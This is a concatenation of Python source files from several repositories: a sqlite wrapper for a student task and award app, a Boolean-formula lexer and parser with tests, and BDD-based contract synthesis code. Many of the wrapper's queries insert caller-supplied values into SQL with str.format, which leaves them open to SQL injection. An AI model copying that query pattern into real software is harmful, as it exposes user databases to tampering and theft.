return [Student(tuple) for tuple in self._db.execute("""
select * from Student where ProjectID={id}"""
.format(id=ProjectID)).fetchall()]
def getProjects(self):
return [Project(tuple) for tuple in self._db.execute("select * from Project").fetchall()]
def insertAward(self,StudentID:int,AppleType:str,ProjectName:str,DateAwarded:str):
try:
self._db.execute("""insert into Award("StudentID", "apple_type", "ProjectName", "DateAwarded")
values({id}, "{type}", "{name}", "{date}");"""
.format(id=StudentID,type=AppleType,name=ProjectName,date=DateAwarded))
self._db.commit()
except sqlite3.Error as error:
print("Failed to insert data into sqlite table", error)
def addMessage(self, UserName, TaskID, TimeStmp, MessageString, StudentID):
self._db.execute(""" INSERT INTO Chat
(UserName, TaskID, TimeStmp, MessageString) VALUES (?, ?, ?, ?)""", (UserName, TaskID, TimeStmp, MessageString))
self._db.commit()
ProjectID = self.getTask(TaskID).getProjectID()
students = self.getStudentsOnProject(ProjectID)
for student in students:
if student.getStudentID() != StudentID:
self._db.execute(""" INSERT INTO MessageNotifications
(MessageContent, TaskID, Viewed, StudentID) VALUES (?, ?, ?, ?)""", (MessageString, TaskID, 0, student.getStudentID()))
self._db.commit()
def removeNotification(self, NotificationID):
try:
self._db.execute(""" DELETE FROM MessageNotifications
WHERE NotificationID = ?""", (NotificationID,))
self._db.commit()
except sqlite3.Error as error:
print("Failed to insert data into sqlite table", error)
def getNotifications(self, StudentID, TaskID):
try:
return [MessageNotifications(tuple) for tuple in self._db.execute("""
select * from MessageNotifications where TaskID={tid} and StudentID={sid};"""
.format(tid=TaskID, sid=StudentID)).fetchall()]
except sqlite3.Error as error:
print("Failed to insert data into sqlite table", error)
def getChatForTask(self, TaskID):
return [Chat(tuple) for tuple in self._db.execute(
"""select * from Chat where TaskID={id};""".format(id=TaskID)).fetchall()]
def getGoalForProject(self, ProjectID):
return [Goal(tuple) for tuple in self._db.execute("""
select * from ProjectGoal where ProjectID = {id}"""
.format(id=ProjectID)).fetchall()][0]
def getFilesForTask(self, TaskID):
return [Files(tuple) for tuple in self._db.execute(
"""select * from Files where TaskID={id};""".format(id=TaskID)).fetchall()]
def addFile(self, TaskID, FileName, FileType):
try:
self._db.execute(""" INSERT INTO Files
(TaskID, FileName, FileType) VALUES (?, ?, ?)""", (TaskID, FileName, FileType))
self._db.commit()
except sqlite3.Error as error:
print("Failed to insert data into sqlite table", error)
def removeFile(self, FileName):
try:
self._db.execute(""" DELETE FROM Files
WHERE FileName = ?""", (FileName,))
self._db.commit()
except sqlite3.Error as error:
print("Failed to insert data into sqlite table", error)
def insertNewStudent(self, FirstName:str, LastName:str, TeacherID:int, ProjectID: int, PermissionLevel:str):
try:
self._db.execute("""insert into Student(FirstName, LastName, TeacherID,
ProjectID, RoleType)
values("{fname}", "{lname}", {teachID}, {projID}, "{permLvl}");"""
.format(fname=FirstName, lname=LastName, teachID=TeacherID,
projID=ProjectID, permLvl=PermissionLevel))
self._db.commit()
except sqlite3.Error as error:
print("Failed to insert data into sqlite table", error)
def insertNewTask(self, BranchID: int, StudentID: int, ProjectID: int, TaskDesc: str, TaskWeight: int):
try:
self._db.execute("""insert into Task
(BranchID, StudentID, ProjectID, TaskDescription, Resolved, Weight)
values({bID}, {sID}, {pID}, "{tDesc}", 0, "{tWght}");"""
.format(bID=BranchID, sID=StudentID, pID=ProjectID, tDesc=TaskDesc, tWght=TaskWeight))
self._db.commit()
except sqlite3.Error as error:
print("Failed to insert data into sqlite table", error)
def insertTaskReview(self, TaskID: int):
try:
self._db.execute("""insert into TaskReview
(TaskID, Resolved, Rating)
values({tID}, 0, 0);"""
.format(tID=TaskID))
self._db.commit()
except sqlite3.Error as error:
print("Failed to insert data into sqlite table", error)
def markTaskResolved(self, TaskID: int, Rating: int):
try:
self._db.execute("""UPDATE TaskReview
SET Resolved = 1, Rating = {Rating}
WHERE TaskID = {tID}"""
.format(tID=TaskID, Rating=Rating))
self._db.execute("""UPDATE Task
SET Resolved = 1
WHERE TaskID = {tID}"""
.format(tID=TaskID, Rating=Rating))
self._db.commit()
except sqlite3.Error as error:
print("Failed to insert data into sqlite table", error)
def getTasksToBeReviewed(self):
return [TaskReview(tuple) for tuple in self._db.execute("select * from TaskReview").fetchall()]
def getTaskReviewedStatus(self, TaskID: int):
return [TaskReview(tuple) for tuple in self._db.execute(
"""select * from TaskReview where TaskID={id};""".format(id=TaskID)).fetchall()]
def updateAwardedApples(self, StudentID: int):
self._db.execute("""UPDATE Student SET ApplesAwarded = ApplesAwarded + 1 WHERE StudentID = {StudentID}""".format(StudentID=StudentID))
self._db.commit()
def updateTaskCreation(self, StudentID: int):
self._db.execute("""UPDATE Student SET FirstTask = 1 WHERE StudentID = {StudentID}""".format(StudentID=StudentID))
self._db.commit()
def updateGrowthStatus(self, ProjectID, GrowthStatus: str):
try:
self._db.execute("""UPDATE Project
SET GrowthStatus = '{gStatus}'
WHERE ProjectID = {pID}"""
.format(gStatus=GrowthStatus, pID=ProjectID))
self._db.commit()
except sqlite3.Error as error:
print("Failed to insert data into sqlite table", error)
def getTaskReviewsForProject(self, ProjectID: int):
return [TaskReview(tuple) for tuple in self._db.execute(
"""select * from Taskreview where taskid in
(select TaskID from Task where ProjectID = {projID});"""
.format(projID=ProjectID))]
def close_connection(self, exception):
self._db.close()
``` |
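A minimal usage sketch of the chat/notification helpers above. Here `db` stands for an instance of the database wrapper class these methods belong to (defined earlier in the file), and `getNotificationID()` is an assumed accessor on the `MessageNotifications` objects returned by `getNotifications`:

```python
# `db` is an instance of the database wrapper defined earlier in this file
db.addMessage('alice', TaskID=3, TimeStmp='2021-05-01 09:00',
              MessageString='Is the prototype done?', StudentID=7)

# every other student on the project now has an unread notification
for note in db.getNotifications(StudentID=8, TaskID=3):
    # getNotificationID() is an assumed accessor on MessageNotifications
    db.removeNotification(note.getNotificationID())
```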
{
"source": "johnyf/astutils",
"score": 3
} |
#### File: examples/foo/lexyacc.py
```python
import astutils
from foo.ast import Nodes
TABMODULE = 'foo.calc_parsetab'
class Lexer(astutils.Lexer):
"""Lexer for Boolean formulae."""
reserved = {
'False': 'FALSE',
'True': 'TRUE'}
delimiters = ['LPAREN', 'RPAREN', 'COMMA']
operators = ['NOT', 'AND', 'OR', 'XOR', 'IMP', 'BIMP',
'EQUALS', 'NEQUALS']
misc = ['NAME', 'NUMBER']
def t_NAME(self, t):
r"[A-Za-z_][A-za-z0-9]*"
t.type = self.reserved.get(t.value, 'NAME')
return t
def t_AND(self, t):
r'\&\&'
t.value = '&'
return t
def t_OR(self, t):
r'\|\|'
t.value = '|'
return t
t_NOT = r'\!'
t_XOR = r'\^'
t_LPAREN = r'\('
t_RPAREN = r'\)'
t_NUMBER = r'\d+'
t_IMP = '->'
    t_BIMP = r'\<->'
t_ignore = " \t"
def t_comment(self, t):
r'\#.*'
return
def t_newline(self, t):
r'\n+'
t.lexer.lineno += t.value.count("\n")
class Parser(astutils.Parser):
"""Parser for Boolean formulae."""
tabmodule = TABMODULE
start = 'expr'
# low to high
precedence = (
('left', 'BIMP'),
('left', 'IMP'),
('left', 'XOR'),
('left', 'OR'),
('left', 'AND'),
('left', 'EQUALS', 'NEQUALS'),
('right', 'NOT'))
Lexer = Lexer
nodes = Nodes
def p_bool(self, p):
"""expr : TRUE
| FALSE
"""
p[0] = self.nodes.Bool(p[1])
def p_number(self, p):
"""expr : NUMBER"""
p[0] = self.nodes.Num(p[1])
def p_var(self, p):
"""expr : NAME"""
p[0] = self.nodes.Var(p[1])
def p_unary(self, p):
"""expr : NOT expr"""
p[0] = self.nodes.Unary(p[1], p[2])
def p_binary(self, p):
"""expr : expr AND expr
| expr OR expr
| expr XOR expr
| expr IMP expr
| expr BIMP expr
| expr EQUALS expr
| expr NEQUALS expr
"""
p[0] = self.nodes.Binary(p[2], p[1], p[3])
def p_paren(self, p):
"""expr : LPAREN expr RPAREN"""
p[0] = p[2]
def _rewrite_tables(outputdir='./'):
astutils.rewrite_tables(Parser, TABMODULE, outputdir)
# this is a convenience to regenerate the tables
# during development
if __name__ == '__main__':
_rewrite_tables()
```
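A short usage sketch for the grammar above; it assumes `foo.ast.Nodes` supplies the `Bool`, `Num`, `Var`, `Unary`, and `Binary` classes referenced in the production rules, with a `flatten()` method as in `astutils.ast`:

```python
from foo.lexyacc import Parser

parser = Parser()
tree = parser.parse('!(a && b) -> c')
# prefix-form dump of the syntax tree, assuming the nodes mirror `astutils.ast`
print(tree.flatten())
```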
#### File: astutils/tests/ast_test.py
```python
from astutils import ast
def test_terminal():
value = 'a'
t = ast.Terminal(value)
r = repr(t)
assert r == "Terminal('a', 'terminal')", r
r = str(t)
assert r == 'a', r
r = len(t)
assert r == 1, r
r = t.flatten()
assert r == value, r
def test_hash():
# different AST node instances should
# have different hash
#
# terminals
value = 'foo'
a = ast.Terminal(value)
b = ast.Terminal(value)
assert hash(a) != hash(b)
# operators
op = 'bar'
a = ast.Operator(op)
b = ast.Operator(op)
assert hash(a) != hash(b)
def test_eq():
value = 'a'
t = ast.Terminal(value)
p = ast.Terminal(value)
assert t == p, (t, p)
p = ast.Terminal('b')
assert t != p, (t, p)
p = ast.Terminal(value, 'number')
assert t != p, (t, p)
p = 54
assert t != p, (t, p)
def test_operator():
a = ast.Terminal('a')
b = ast.Terminal('b')
op = '+'
operands = [a, b] # 'a', 'b' fail due to `str`
t = ast.Operator(op, *operands)
r = repr(t)
r_ = (
"Operator('+', "
"Terminal('a', 'terminal'), "
"Terminal('b', 'terminal'))")
assert r == r_, r
r = str(t)
assert r == '(+ a b)', r
r = len(t)
assert r == 3, r
r = t.flatten()
assert r == '( + a, b )', r
```
#### File: astutils/tests/ply_test.py
```python
import os
import astutils.ply
from nose import tools as nt
class Lexer(astutils.ply.Lexer):
operators = ['NOT', 'AND']
misc = ['NAME']
    t_NAME = r"[A-Za-z_][A-Za-z0-9]*"
t_NOT = r'~'
t_AND = r'/\\'
t_ignore = ' \t'
class Parser(astutils.ply.Parser):
tabmodule = 'testing_parsetab'
start = 'expr'
precedence = (
('left', 'AND'),
('right', 'NOT'))
Lexer = Lexer
def p_not(self, p):
"""expr : NOT expr"""
p[0] = not p[2]
def p_and(self, p):
"""expr : expr AND expr"""
p[0] = p[1] and p[3]
def p_name(self, p):
"""expr : NAME"""
s = p[1]
p[0] = self.names[s]
def test_parser():
parser = Parser()
parser.names = {'True': True, 'False': False}
s = 'True'
r = parser.parse(s)
assert r is True, r
s = 'True /\ True'
r = parser.parse(s)
assert r is True, r
s = 'False /\ True'
r = parser.parse(s)
assert r is False, r
s = '~ False /\ ~ True'
r = parser.parse(s)
assert r is False, r
s = '~ False /\ True'
r = parser.parse(s)
assert r is True, r
def test_illegal_character():
parser = Parser()
parser.names = {'True': True}
s = '( True'
with nt.assert_raises(Exception):
parser.parse(s)
def test_syntax_error():
parser = Parser()
parser.names = {'True': True}
s = 'True True'
with nt.assert_raises(Exception):
parser.parse(s)
def test_rewrite_tables():
prefix = 'foo'
outputdir = './'
for ext in ('.py', '.pyc'):
try:
os.remove(prefix + ext)
        except OSError:
            pass
f = prefix + '.py'
assert not os.path.isfile(f)
astutils.ply.rewrite_tables(
Parser, prefix, outputdir)
assert os.path.isfile(f)
``` |
{
"source": "johnyf/contract_maker",
"score": 2
} |
#### File: johnyf/contract_maker/contracts_pinfo.py
```python
import copy
import logging
import math
import pprint
from dd import autoref
from dd import cudd
from omega.logic import syntax as stx
from omega.symbolic import bdd as scope
from omega.symbolic import bdd as sym_bdd
import bdd as _bdd
import closure_noninterleaving as _closure
import cpre_noninterleaving as cpre
import fixpoint_noninterleaving as fx
import masks as _masks
import symbolic as sym
from symbolic import print_expr, dumps_expr
import utils
log = logging.getLogger(__name__)
LOG = 100
TURN = utils.TURN
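# Below, Mask(m, v, h) equals the hidden value h when the mask bit m is set,
# and the visible value otherwise; Selector(h, r) == (r = Mask(m, v, h)).
# `parametric_predicate` computes  \E h, r:  Selector(h, r) /\ pred(r, y).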
def parametric_predicate(pred, aut):
pred_r = aut.let(aut.x_to_r, pred)
u = aut.selector & pred_r
u = aut.exist(aut.hr, u)
return u
def observable(target, within, inv, aut):
"""Return states that `player` can tell satisfy `target`."""
assert scope.is_state_predicate(target)
assert scope.is_state_predicate(within)
assert scope.is_state_predicate(inv)
within_r = aut.let(aut.x_to_r, within)
inv_r = aut.let(aut.x_to_r, inv)
target_r = aut.let(aut.x_to_r, target)
#
# Mask(m, v, h) == (IF m = TRUE THEN h ELSE x)
# Selector(h, r) == r = Mask(m, v, h)
#
# Observable(x, y, m, Target(_, _, _)) ==
# /\ \E h:
# LET r == Mask(m, v, h)
# IN Inv(r, y)
# /\ \A h:
# LET r == Mask(m, h, x)
# IN Within(r, y, m) => Target(r, y, m)
# <=>
# /\ \E h, r:
# /\ Selector(h, r)
# /\ Inv(r, y)
# /\ \A h: \E r:
# /\ Selector(h, r)
# /\ Within(r, y, m) => Target(r, y, m)
u = target_r | ~ within_r
u &= aut.selector
u = aut.exist(aut.r, u)
u = aut.forall(aut.h, u)
# \E h, r:
# /\ Selector(h, r)
# /\ Inv(r, y)
u &= aut.exist(aut.hr, inv_r & aut.selector)
# check support
vrs = aut.vars_of_all_players | aut.masks
assert scope.support_issubset(u, vrs, aut), (
aut.support(u) - vrs)
return u
def maybe(target, within, aut):
"""Return `aut.observer` states that could satisfy `target`.
This function is equivalent to:
/\ observable(target, within, aut)
/\ param_inv
"""
assert scope.is_state_predicate(target)
assert scope.is_state_predicate(within)
within_r = aut.let(aut.x_to_r, within)
target_r = aut.let(aut.x_to_r, target)
#
# Project(x, y, m, i, Target) ==
# /\ \E h:
# LET
# r == Mask(m, h, x)
# IN
# /\ Inv(r, y, m, i)
# /\ Target(r, y, m, i)
# <=>
# \E h, r:
# /\ Selector(h, r)
# /\ Inv(r, y, m, i)
# /\ Target(r, y, m, i)
#
# Note that:
#
# Project(Target) <=> /\ ~ Observable(~ Target)
# /\ \E h: LET r == Mask(m, h, x)
# IN Inv(r, y, m, i)
# s = r'''
# \E {h}, {r}: (
# /\ {selector}
# /\ @{target}
# /\ @{inv} )
# '''.format(
# h=h, r=r,
# selector=aut.selector,
# inv=within_r,
# target=target_r)
# u = aut.add_expr(s)
u = aut.selector & target_r & within_r
assert scope.is_state_predicate(u)
return aut.exist(aut.hr, u)
def main(aut):
"""Decompose specification into a contract."""
inv = _closure.closure(aut.players, aut)
assert not (aut.support(inv) & aut.masks)
assert_type_invariant_implies_type_hints(inv, aut)
fname = 'inv_bdd.pdf'
dump_bdd_using_autoref(inv, fname)
_closure.print_state_space_statistics(inv, aut)
s = dumps_expr(inv, aut, use_types=True)
print('\nshared invariant Inv:\n')
print(s)
# fname = 'Invariant.tla'
# utils.dump_as_tla(s, fname)
#
# for charging station example
# sys_player = 'station'
# vrs = ['pos_x', 'pos_y'] # hide these variables
#
# for landing gear example
sys_player = 'autopilot'
vrs = ['door']
_closure.hide_vars_from_sys(vrs, inv, sys_player, aut)
#
# for charging station example
# sys_player = 'robot'
# players = ['robot', 'station']
#
# for autopilot example
sys_player = 'autopilot'
players = ['autopilot', 'gear_module', 'door_module']
#
aut.global_inv = inv # global full-info invariant
aut_unzipped = _closure.unzip(inv, aut.players, aut)
# configure mask parameters
initial_phase = 0
phase = '{i}_0'.format(i=initial_phase)
_masks.add_masks_and_hidden_vars(aut_unzipped, phase=phase)
aut_unzipped.observe(sys_player, [sys_player])
# require initial condition
param_inv = parametric_predicate(inv, aut_unzipped)
param_z = outer_fixpoint(players, aut_unzipped)
z = param_z[initial_phase]
u = z | ~ param_inv
qvars = aut.vars_of_all_players
u = aut_unzipped.forall(qvars, u)
# BDD stats
stats = aut.bdd.statistics()
s = utils.format_stats(stats)
print(s)
def dump_bdd_using_autoref(u, fname):
# copy from `dd.cudd` to `dd.autoref`
b = autoref.BDD()
cudd_bdd = u.bdd
_bdd.copy_vars(cudd_bdd, b)
r = _bdd.copy_bdd(u, cudd_bdd, b)
autoref.reorder(b)
b.dump(fname, [r])
print('dumped BDD to file "{f}"'.format(f=fname))
def maximum_sum(u, aut):
"""Return assignment that maximizes sum of `u` support vars.
`u` should depend only on integer-valued variables.
For example, if `u` depends on the variables `a, b, c`
and `values == dict(a=1, b=2, c=-1)` is returned, then the
following properties hold:
/\ LET a == 1
b == 2
c == -1
IN u
/\ \A i, j, k:
(LET a == i
b == j
c == k
IN u)
=> (a + b + c >= i + j + k)
"""
vrs = aut.support(u)
assert vrs.issubset(aut.masks), vrs
vrs_sum = ' + '.join(vrs)
# bisection
a = 0
b = len(vrs)
assert a < b, (a, b)
s = '@{u} /\ ({vrs_sum} >= {{bound}})'.format(
u=u, vrs_sum=vrs_sum)
fa = _eval(s, a, aut)
fb = _eval(s, b, aut)
assert fa, 'not feasible'
while a != b:
c = math.ceil((a + b) / 2)
fc = _eval(s, c, aut)
if fc:
a = c
else:
b = c - 1
print('bisection: {ab}'.format(ab=(a, b)))
assert a == b, (a, b)
bound = a
print('Maximum: {bound}'.format(bound=bound))
# return a maximal satisfying assignment
s = s.format(bound=bound)
u = aut.add_expr(s)
values = {var: 1 for var in aut.masks}
values.update(aut.pick(u))
return values
def _eval(s, bound, aut):
"""Return """
s = s.format(bound=bound)
u = aut.add_expr(s)
return u != aut.false
def assert_type_invariant_implies_type_hints(inv, aut):
"""Raise `AssertionError` if `~ |= inv => type_hints`."""
vrs = aut.vars_of_all_players
assert aut.implies_type_hints(inv, vrs)
def outer_fixpoint(players, aut):
player = players[0]
n_goals = len(aut.win[player]['[]<>'])
z = [aut.true] * n_goals
zold = [None] * n_goals
# effectively the greatest fixpoint Z
while z != zold:
zold = z
z = iterate_recurrence_goals(z, players, aut)
assert all(u <= v for u, v in zip(z, zold))
return z
def iterate_recurrence_goals(z, players, aut):
within = aut.global_inv
player = players[0]
k_players = len(players) - 1
n_goals = len(aut.win[player]['[]<>'])
for i in range(n_goals):
for j in range(k_players):
phase = '{i}_{j}'.format(i=i, j=j)
_masks.add_masks_and_hidden_vars(aut, phase=phase)
z_new = list(z)
for i, goal in enumerate(aut.win[player]['[]<>']):
print('recurrence goal: {i}'.format(i=i))
# declare at top to propagate to copied automata
# caution: overwrites parameter maps
ij = (i, 0)
i_next = (i + 1) % n_goals
z_next = z[i_next]
y = single_recurrence_goal(goal, z_next, within, players, ij, aut)
z_new[i] &= y
return z_new
def single_recurrence_goal(target, z_next, within, players, ij, aut):
"""Development harness for parameterized assumption construction."""
assert 'scheduler' not in players
print('single recurrence goal: {ij}'.format(ij=ij))
i, j = ij
assert i >= 0, i
assert j >= 0, j
phase = '{i}_{j}'.format(i=i, j=j)
_masks.add_masks_and_hidden_vars(aut, phase=phase)
# define players that assumptions will be generated for
# players outside `team` are treated as the team's environment
player, *team = players
print('player: {p}'.format(p=player))
print('team: {t}'.format(t=team))
# define what the component observes
aut.observe(player, [player])
# eliminate hidden vars from target
inv = aut.global_inv
vis_z = observable(z_next, inv, inv, aut)
vis_target = observable(target, inv, inv, aut)
y = vis_target
# print('vis_target')
# print_slice(vis_target, aut)
yold = None
# iterate over assumption generation,
# which is effectively the least fixpoint Y
trap = aut.true
etas = list()
while y != yold:
# print('Y iteration')
yold = y
# can others help as a team ?
attr, trap, eta_team = make_pinfo_assumption(
y, vis_z, within, player, team, aut)
etas.append(eta_team)
within_new = inv & trap
z_next_new = aut.true
ij_new = (i, j + 1)
# decompose team
if len(team) > 1:
single_recurrence_goal(
~ eta_team, z_next_new, within_new,
team, ij_new, aut)
y = attr | trap
# print('Y')
# print_slice(y, aut)
# \A vars: (Inv /\ ~ Target) => Y
aut.observe(player, [player])
proj_inv = maybe(inv, inv, aut)
u = y | ~ proj_inv
qvars = aut.vars_of_all_players
u = aut.forall(qvars, u)
print('Maybe(Inv) => Y')
print_slice(u, aut)
u = y | target | ~ inv
u = aut.forall(qvars, u)
print('Inv => (Y \/ Target)')
print_slice(u, aut)
print('end: {ij}========\n'.format(ij=ij))
return y
def make_pinfo_assumption(
goal, z, within, player, team, aut):
assert goal != aut.false
assert player not in team, (player, team)
inv = aut.global_inv
# player automaton
aut.team = [player]
aut.observe(player, [player])
cpre.group_as_env_sys(aut.team, aut)
cpre.parametrize_actions(aut)
# team automaton
team_aut = copy.copy(aut)
team_aut.team = list(team)
crow = team[0]
team_aut.observe(crow, team)
cpre.group_as_env_sys(team, team_aut)
cpre.parametrize_actions(team_aut)
# player attractor
goal &= cpre.step(z, aut)
attr = cpre.attractor(goal, aut)
# team attractor initializes `basin`
goal_team = observable(attr, inv, inv, team_aut)
basin = cpre.attractor(goal_team, team_aut)
# chase escapes
escape = aut.true
converged = aut.false
while escape != aut.false:
print('escapes iteration')
# enlarge, following escapes
proj_inv = maybe(inv, inv, team_aut)
out = ~ basin & proj_inv
# check equivalent expression
# this equivalence holds because `basin` has as support
# only variables visible to the team
out_2 = ~ basin & inv
out_2 = maybe(out_2, inv, team_aut)
assert out_2 == out
#
holes = basin & cpre.step(out, team_aut)
escape = out & fx.image(holes & inv, team_aut) # assembly step
escape = out & maybe(escape, inv, team_aut)
escape &= ~ converged # keep converged ones unchanged
old_basin = basin
basin |= escape
# recompute
eta_player, eta_team = persistence_guarantee(
attr, basin, within, aut, team_aut)
non_empty = non_empty_slices(eta_player, aut)
converged |= non_empty
# assert
non_full = non_empty_slices(~ eta_player, aut)
assert non_empty != aut.true, 'disconnected comm too ??'
assert non_full == aut.true
assert scope.support_issubset(converged, aut.masks, aut)
assert converged == aut.false or eta_player != aut.false
assert converged != aut.true, 'all architectures converged'
assert goal <= attr
assert eta_player & goal == aut.false
assert eta_player & attr == aut.false
print('trap')
print_slice(eta_player, aut)
print('eta_team')
print_slice(eta_team, team_aut)
return attr, eta_player, eta_team
def persistence_guarantee(
attr, basin, within, aut, team_aut):
"""Create an assumption in presence of hiding."""
assert attr != aut.false
inv = team_aut.global_inv
# attractor by team
u = ~ basin & maybe(inv, inv, team_aut)
goal_team = (
observable(attr, inv, inv, team_aut)
| u)
b_team = basin & cpre.attractor(goal_team, team_aut)
eta_team = b_team & ~ goal_team
# trap by player
assert eta_team <= basin # => obs_basin unnecessary
stay = observable(eta_team, inv, inv, aut)
unless = attr
trap = cpre.trap(stay, unless, aut)
eta_player = trap & ~ unless
return eta_player, eta_team
def exist_env_vars(u, aut):
"""Projection `\E env_vars: u`."""
qvars = aut.varlist['env']
r = aut.exist(qvars, u)
return r
def print_slice(u, aut, conj_types=False):
v = _slice(u, aut)
if v == aut.false:
print('FALSE')
return
if v == aut.true:
print('TRUE')
return
if conj_types:
v &= sym.type_hints_for_support(v, aut)
care = aut.true
s = sym.dumps_expr(v, aut, care=care, use_types=True)
print(s + '\n')
def _slice(u, aut):
return _slice_landing_gear_example(u, aut)
def _slice_charging_station_example(u, aut):
"""Replace masks with values."""
comm = dict(
station=dict(
req=1,
pos_x=0,
pos_y=0,
occ=1,
_i=1),
robot=dict(
spot_1=0,
spot_2=0,
free_x=1,
free_y=0,
free=1,
occ=0,
_i=1))
phase = '0_0'
values = connectivity_to_masks(comm, phase)
v = aut.let(values, u)
comm = dict(
station=dict(
req=1,
pos_x=0,
pos_y=0,
occ=1,
_i=1),
robot=dict(
spot_1=0,
spot_2=0,
free_x=1,
free_y=1,
free=1,
occ=0,
_i=1))
phase = '1_0'
values = connectivity_to_masks(comm, phase)
v = aut.let(values, v)
return v
def _slice_landing_gear_example(u, aut):
"""Replace masks with values."""
# takeoff to cruise, this one only for top level
# cruise: mode = 1
comm_to_cruise_1 = dict(
autopilot=dict(
gear=0,
door=1,
_i=1),
gear_module=dict(
mode=1,
height=1,
speed=0,
_i=1))
# landing: mode = 0
comm_to_landing_1 = dict(
autopilot=dict(
gear=1,
door=0,
_i=1),
gear_module=dict(
mode=1,
height=0,
speed=1,
_i=1))
phase = '0_0'
values_1 = connectivity_to_masks(comm_to_landing_1, phase)
phase = '1_0'
values_2 = connectivity_to_masks(comm_to_cruise_1, phase)
# lower level
# cruise: mode = 1
comm_to_cruise_2 = dict(
autopilot=dict(
gear=0,
door=1,
_i=1),
door_module=dict(
mode=0,
height=0,
speed=0,
gear=1,
_i=1),
gear_module=dict(
mode=1,
height=1,
speed=0,
door=1,
_i=1))
# landing: mode = 0
comm_to_landing_2 = dict(
autopilot=dict(
gear=1,
door=0,
_i=1),
door_module=dict(
mode=1,
height=0,
speed=1,
gear=0,
_i=1),
gear_module=dict(
mode=1,
height=0,
speed=1,
door=1,
_i=1))
phase = '0_1'
values_3 = connectivity_to_masks(comm_to_landing_2, phase)
phase = '1_1'
values_4 = connectivity_to_masks(comm_to_cruise_2, phase)
values = values_1
values.update(values_2)
values.update(values_3)
values.update(values_4)
v = aut.let(values, u)
return v
def non_empty_slices(u, aut):
"""Return parameters that yield non-empty `u` slice."""
qvars = aut.vars_of_all_players
return aut.exist(qvars, u)
def communication_schedule(aut):
"""Return assignment to indexed mask vars, as `dict`."""
phases = aut.phases
values = dict()
for phase, j in phases.items():
comm = aut.comm_arch(phase)
for player, vrs in comm.items():
for var, visible in vrs.items():
s = '{player}_mask_{var}_{j}'.format(
player=player, var=var, j=j)
values[s] = 1 - visible
return values
def connectivity_to_masks(comm, j):
values = dict()
for player, vrs in comm.items():
for var, visible in vrs.items():
s = '{player}_mask_{var}_{j}'.format(
player=player, var=var, j=j)
values[s] = 1 - visible
return values
class Automaton(sym.Automaton):
"""Subclass to copy attributes relevant to hiding."""
def __init__(self):
super().__init__()
self.global_inv = None # full info invariant
self.inv = None # InvH
self.team = list() # \subseteq self.players
self.visible = list()
self.observer = None
self.masks = set()
self.masks_of = dict()
self.xy_to_h = dict()
self.xy_to_r = dict()
self.x_to_r = dict()
self.h = set()
self.r = set()
self.hr = set()
self.mask_to_subproblem = dict()
self.type_invariant = None
self.bdd.configure(
max_memory=2 * cudd.GB,
max_cache_hard=2**25)
def __copy__(self):
new = super().__copy__()
new.global_inv = self.global_inv
new.inv = self.inv
new.team = list(self.team)
new.visible = self.visible
new.observer = self.observer
new.masks = self.masks
new.masks_of = self.masks_of
new.xy_to_h = dict(self.xy_to_h)
new.xy_to_r = dict(self.xy_to_r)
new.x_to_r = dict(self.x_to_r)
new.h = set(self.h)
new.r = set(self.r)
new.hr = set(self.hr)
# global indexing of masks
new.mask_to_subproblem = self.mask_to_subproblem
new.type_invariant = self.type_invariant
return new
def observe(self, player, visible):
"""Set observer and """
self.observer = player
self.visible = visible
x = utils.collect_env_vars(
visible, self.players, self)
selector = _masks.masking_predicates(
self.observer, x, self)
self.selector = self.add_expr(selector)
x = utils.collect_env_vars(
visible, self.players, self)
self.x_to_r = {
k: v for k, v in self.xy_to_r.items()
if k in x}
self.h = {self.xy_to_h[var] for var in x}
self.r = {self.xy_to_r[var] for var in x}
self.hr = self.h | self.r
```
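`maximum_sum` above bisects on the sum of mask bits to find the largest feasible bound. Stripped of BDDs, the same bisection skeleton looks as follows; `feasible` is a placeholder for the `_eval` check and is assumed to be monotonically decreasing in the bound:

```python
import math

def max_feasible_bound(feasible, lo, hi):
    """Largest bound in [lo, hi] with feasible(bound) == True.

    Assumes feasible(lo) holds and that feasibility never recovers
    once it fails as the bound grows.
    """
    assert feasible(lo), 'not feasible'
    while lo != hi:
        mid = math.ceil((lo + hi) / 2)
        if feasible(mid):
            lo = mid
        else:
            hi = mid - 1
    return lo
```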
#### File: johnyf/contract_maker/cpre_noninterleaving.py
```python
from omega.symbolic import bdd as scope
import symbolic as sym
import utils
def group_as_env_sys(team, aut):
"""Assign "env" and "sys" in `aut.action`."""
others = set(aut.players).difference(team)
sys_next = sym.conj_actions_of(team, aut)
env_next = sym.conj_actions_of(others, aut)
aut.action['sys'] = sys_next
aut.action['env'] = env_next
sys_vars = aut.vars_of_players(team)
env_vars = aut.vars_of_players(others)
aut.varlist['sys'] = sys_vars
aut.varlist['env'] = env_vars
aut.varlist['sys_p'] = aut.prime_vars(sys_vars)
aut.varlist['env_p'] = aut.prime_vars(env_vars)
def parametrize_actions(aut):
"""Return parametrized actions."""
sys_next = aut.action['sys']
env_next = aut.action['env']
x = utils.collect_env_vars(aut.visible, aut.players, aut)
h = {aut.xy_to_h[var] for var in x}
r = {aut.xy_to_r[var] for var in x}
x_to_r = {k: v for k, v in aut.xy_to_r.items()
if k in x}
inv = aut.global_inv
# substitutions
inv_r = aut.let(x_to_r, inv)
sys_next_r = aut.let(x_to_r, sys_next)
env_next_r = aut.let(x_to_r, env_next)
#
# Selector(h, r) == r = Mask(m, v, h)
#
# MaskedInv(h) ==
# LET r == Mask(m, v, h)
# IN Inv(r, y)
# <=>
# \E r: /\ Selector(h, r)
# /\ Inv(r, y)
u = inv_r & aut.selector
masked_inv = aut.exist(r, u)
#
# ParamInv == \E h: MaskedInv(h)
param_inv = aut.exist(h, masked_inv)
#
# ParamSysNext ==
# /\ ParamInv
# /\ \A h: LET r == Mask(m, v, h)
# IN Inv(r, y) => SysNext(r, y, y')
# <=>
# /\ ParamInv
# /\ \A h: \E r:
# /\ Selector(h, r)
# /\ Inv(r, y) => SysNext(r, y, y')
u = sys_next_r | ~ inv_r
u &= aut.selector
u = aut.exist(r, u)
u = aut.forall(h, u)
param_sys_next = u & param_inv
#
# ParamEnvNext ==
# \E h: /\ MaskedInv(h)
# /\ MaskedEnvNext(h, v', x')
# <=>
# \E h: LET r == Mask(m, v, h)
# IN
# /\ Inv(r, y)
# /\ EnvNext(r, y, x')
# <=>
# \E h: \E r:
# /\ Selector(h, r)
# /\ Inv(r, y)
# /\ EnvNext(r, y, x')
u = aut.selector & inv_r & env_next_r
param_env_next = aut.exist(h | r, u)
aut.action['sys'] = param_sys_next
aut.action['env'] = param_env_next
def trap(stay, escape, aut):
"""Greatest fixpoint, with lower bound."""
assert scope.is_state_predicate(stay)
assert scope.is_state_predicate(escape)
qold = None
q = aut.true
while q != qold:
qold = q
